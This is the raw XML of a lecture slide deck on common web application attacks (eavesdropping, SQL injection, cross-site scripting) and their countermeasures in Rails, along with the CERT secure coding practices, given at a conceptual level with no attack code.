                <a:srgbClr val="FF00FF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2475115" y="3495054"/>
              <a:ext cx="347652" cy="2011742"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF00FF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396227" y="3495054"/>
              <a:ext cx="266693" cy="2011742"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF00FF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527985" y="3523634"/>
              <a:ext cx="706418" cy="1983162"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF00FF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Three Common Web App Attacks and Countermeasures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9938" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Eavesdropping on network communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Encrypt communications with SSL</a:t>
            </a:r>
          </a:p>
          <a:p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Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Use escaped queries</a:t>
            </a:r>
          </a:p>
          <a:p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Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Cross-site scripting (another type of injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Use Rails (escape text)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822825"/>
            <a:ext cx="9144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00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Although these attacks are common,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>there are many more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00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(e.g., cross-site request forgery –</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hartl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Ch.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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-6350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CERT Top 10 Software Security Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39938" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1025525"/>
            <a:ext cx="8229600" cy="5360988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Validate input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Heed compiler warnings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Architect and design for security policies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Keep it simple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Default deny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Adhere to the principle of least privilege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Sanitize data sent to other software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Practice defense in depth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Use effective quality assurance techniques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Adopt a software construction security standard</a:t>
            </a:r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5938838" y="6581775"/>
            <a:ext cx="3209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Taken from https://www.securecoding.cert.org/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457200" y="1216025"/>
            <a:ext cx="8229600" cy="2757488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For more attacks and countermeasures, see the Rails Security Guide</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>guides.rubyonrails.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>security.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill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Three Common Web App Attacks and Countermeasures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387600" y="2401888"/>
            <a:ext cx="4368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FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I’ll unfold them one by one…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80A1-7333-314C-9306-DE5F3BA1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C582-3216-C14B-B4CE-C68DDA55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Encrypting communication with SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CERT security practices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FE791DFE-8736-1E4E-8AD4-48C253D58AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4737100"/>
            <a:ext cx="9215438" cy="2139950"/>
            <a:chOff x="0" y="4737100"/>
            <a:chExt cx="9215438" cy="2139950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id="{71E58E72-DE6D-5642-89AF-34926130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23" b="12630"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="4737100"/>
              <a:ext cx="9144000" cy="212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0526F5-C9E0-9441-8D97-183B0F9A3208}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7632700" y="6599238"/>
              <a:ext cx="1582738" cy="27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http://flic.kr/p/aCLor3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86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927600" y="417513"/>
            <a:ext cx="3843338" cy="11430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What potential attack happens here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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635000" y="617538"/>
            <a:ext cx="7821613" cy="5729287"/>
            <a:chOff x="0" y="262777"/>
            <a:chExt cx="5943600" cy="6678938"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2188287" y="4156511"/>
              <a:ext cx="1160492" cy="601456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44859" y="4091738"/>
              <a:ext cx="1160492" cy="60145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223" y="262777"/>
              <a:ext cx="1160492" cy="60145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3716060"/>
              <a:ext cx="4696252" cy="322565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1583" y="4026967"/>
              <a:ext cx="1161698" cy="60330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02638" y="4026967"/>
              <a:ext cx="1160492" cy="603307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5013517" y="5762862"/>
              <a:ext cx="930083" cy="732851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Cloud 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301583" y="1554520"/>
              <a:ext cx="2704597" cy="1511968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 flipH="1">
              <a:off x="881829" y="864233"/>
              <a:ext cx="408946" cy="316273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0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2003718" y="864233"/>
              <a:ext cx="679165" cy="316273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9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1463282" y="4328620"/>
              <a:ext cx="63935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615279" y="4757967"/>
              <a:ext cx="573007" cy="107151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003718" y="4757967"/>
              <a:ext cx="447549" cy="107151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902436" y="4757967"/>
              <a:ext cx="579040" cy="107151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3263129" y="4757967"/>
              <a:ext cx="591103" cy="105856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76426" y="5957178"/>
              <a:ext cx="1160492" cy="6014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32998" y="5892406"/>
              <a:ext cx="1160492" cy="6033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0776" y="5829484"/>
              <a:ext cx="1160492" cy="601456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20782" y="5940523"/>
              <a:ext cx="1160492" cy="60330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77354" y="5877601"/>
              <a:ext cx="1160492" cy="601456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31514" y="5816529"/>
              <a:ext cx="1160492" cy="60330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281274" y="6014548"/>
              <a:ext cx="732243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4301781" y="6273637"/>
              <a:ext cx="71173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11" name="TextBox 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1233821" y="1839413"/>
              <a:ext cx="9541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Ye Olde</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
                <a:t>Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16412" name="TextBox 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1146690" y="326430"/>
              <a:ext cx="9630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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16413" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="234739" y="4045653"/>
              <a:ext cx="1309974" cy="527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Rails Router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16414" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2117390" y="4074677"/>
              <a:ext cx="11336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Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16415" name="TextBox 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1544071" y="5857623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View</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16416" name="TextBox 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3251034" y="583532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Model</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16417" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5241207" y="5932870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DB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H="1">
            <a:off x="4740275" y="2286000"/>
            <a:ext cx="965200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng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927600" y="417513"/>
            <a:ext cx="3843338" cy="11430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What potential attack happens here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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635000" y="617538"/>
            <a:ext cx="7821613" cy="5729287"/>
            <a:chOff x="0" y="262777"/>
            <a:chExt cx="5943600" cy="6678938"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2188287" y="4156511"/>
              <a:ext cx="1160492" cy="601456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44859" y="4091738"/>
              <a:ext cx="1160492" cy="60145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223" y="262777"/>
              <a:ext cx="1160492" cy="60145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3716060"/>
              <a:ext cx="4696252" cy="322565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1583" y="4026967"/>
              <a:ext cx="1161698" cy="60330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02638" y="4026967"/>
              <a:ext cx="1160492" cy="603307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5013517" y="5762862"/>
              <a:ext cx="930083" cy="732851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Cloud 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301583" y="1554520"/>
              <a:ext cx="2704597" cy="1511968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 flipH="1">
              <a:off x="881829" y="864233"/>
              <a:ext cx="408946" cy="316273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0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2003718" y="864233"/>
              <a:ext cx="679165" cy="316273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9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1463282" y="4328620"/>
              <a:ext cx="63935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615279" y="4757967"/>
              <a:ext cx="573007" cy="107151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003718" y="4757967"/>
              <a:ext cx="447549" cy="107151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902436" y="4757967"/>
              <a:ext cx="579040" cy="107151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3263129" y="4757967"/>
              <a:ext cx="591103" cy="105856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76426" y="5957178"/>
              <a:ext cx="1160492" cy="6014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32998" y="5892406"/>
              <a:ext cx="1160492" cy="6033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0776" y="5829484"/>
              <a:ext cx="1160492" cy="601456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20782" y="5940523"/>
              <a:ext cx="1160492" cy="60330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77354" y="5877601"/>
              <a:ext cx="1160492" cy="601456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31514" y="5816529"/>
              <a:ext cx="1160492" cy="60330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281274" y="6014548"/>
              <a:ext cx="732243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4301781" y="6273637"/>
              <a:ext cx="71173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36" name="TextBox 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1233821" y="1839413"/>
              <a:ext cx="9541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Ye Olde</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
                <a:t>Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17437" name="TextBox 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1146690" y="326430"/>
              <a:ext cx="9630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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17438" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="234739" y="4045653"/>
              <a:ext cx="1309974" cy="527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Rails Router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17439" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2117390" y="4074677"/>
              <a:ext cx="11336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Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17440" name="TextBox 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1544071" y="5857623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View</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17441" name="TextBox 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3251034" y="583532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Model</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17442" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5241207" y="5932870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DB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H="1">
            <a:off x="4740275" y="2286000"/>
            <a:ext cx="965200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng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478463" y="1763713"/>
            <a:ext cx="3048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FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eavesdropping, packet sniffing,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FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>man-in-the-middle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2963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Example: Unsecured Sign-Up Page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1843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8013"/>
            <a:ext cx="88026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73213" y="3067050"/>
            <a:ext cx="3278187" cy="2143125"/>
            <a:chOff x="1573561" y="3066585"/>
            <a:chExt cx="3277219" cy="2143513"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18436" name="TextBox 1"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2248829" y="3698489"/>
              <a:ext cx="260195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FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Trivial for packet sniffer to steal</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Right Brace 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1573561" y="3066585"/>
              <a:ext cx="917304" cy="2143513"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF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927600" y="417513"/>
            <a:ext cx="3843338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How to prevent?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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635000" y="617538"/>
            <a:ext cx="7821613" cy="5729287"/>
            <a:chOff x="0" y="262777"/>
            <a:chExt cx="5943600" cy="6678938"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2188287" y="4156511"/>
              <a:ext cx="1160492" cy="601456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44859" y="4091738"/>
              <a:ext cx="1160492" cy="60145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223" y="262777"/>
              <a:ext cx="1160492" cy="60145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3716060"/>
              <a:ext cx="4696252" cy="322565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1583" y="4026967"/>
              <a:ext cx="1161698" cy="60330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02638" y="4026967"/>
              <a:ext cx="1160492" cy="603307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5013517" y="5762862"/>
              <a:ext cx="930083" cy="732851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Cloud 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301583" y="1554520"/>
              <a:ext cx="2704597" cy="1511968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 flipH="1">
              <a:off x="881829" y="864233"/>
              <a:ext cx="408946" cy="316273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0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2003718" y="864233"/>
              <a:ext cx="679165" cy="316273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9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1463282" y="4328620"/>
              <a:ext cx="63935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615279" y="4757967"/>
              <a:ext cx="573007" cy="107151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003718" y="4757967"/>
              <a:ext cx="447549" cy="107151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902436" y="4757967"/>
              <a:ext cx="579040" cy="107151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3263129" y="4757967"/>
              <a:ext cx="591103" cy="105856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76426" y="5957178"/>
              <a:ext cx="1160492" cy="6014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32998" y="5892406"/>
              <a:ext cx="1160492" cy="6033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0776" y="5829484"/>
              <a:ext cx="1160492" cy="601456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20782" y="5940523"/>
              <a:ext cx="1160492" cy="60330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77354" y="5877601"/>
              <a:ext cx="1160492" cy="601456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31514" y="5816529"/>
              <a:ext cx="1160492" cy="60330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281274" y="6014548"/>
              <a:ext cx="732243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4301781" y="6273637"/>
              <a:ext cx="71173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83" name="TextBox 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1233821" y="1839413"/>
              <a:ext cx="9541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Ye Olde</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
                <a:t>Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19484" name="TextBox 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1146690" y="326430"/>
              <a:ext cx="9630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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19485" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="234739" y="4045653"/>
              <a:ext cx="1309974" cy="527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Rails Router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19486" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2117390" y="4074677"/>
              <a:ext cx="11336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Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19487" name="TextBox 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1544071" y="5857623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View</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19488" name="TextBox 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3251034" y="583532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Model</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19489" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5241207" y="5932870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DB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H="1">
            <a:off x="4740275" y="2286000"/>
            <a:ext cx="965200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng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927600" y="417513"/>
            <a:ext cx="3843338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How to prevent?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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635000" y="617538"/>
            <a:ext cx="7821613" cy="5729287"/>
            <a:chOff x="0" y="262777"/>
            <a:chExt cx="5943600" cy="6678938"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2188287" y="4156511"/>
              <a:ext cx="1160492" cy="601456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44859" y="4091738"/>
              <a:ext cx="1160492" cy="60145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223" y="262777"/>
              <a:ext cx="1160492" cy="60145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3716060"/>
              <a:ext cx="4696252" cy="322565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1583" y="4026967"/>
              <a:ext cx="1161698" cy="60330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02638" y="4026967"/>
              <a:ext cx="1160492" cy="603307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5013517" y="5762862"/>
              <a:ext cx="930083" cy="732851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Cloud 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301583" y="1554520"/>
              <a:ext cx="2704597" cy="1511968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 flipH="1">
              <a:off x="881829" y="864233"/>
              <a:ext cx="408946" cy="316273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0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2003718" y="864233"/>
              <a:ext cx="679165" cy="316273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9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1463282" y="4328620"/>
              <a:ext cx="63935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615279" y="4757967"/>
              <a:ext cx="573007" cy="107151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003718" y="4757967"/>
              <a:ext cx="447549" cy="107151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902436" y="4757967"/>
              <a:ext cx="579040" cy="107151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3263129" y="4757967"/>
              <a:ext cx="591103" cy="105856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76426" y="5957178"/>
              <a:ext cx="1160492" cy="6014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32998" y="5892406"/>
              <a:ext cx="1160492" cy="6033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0776" y="5829484"/>
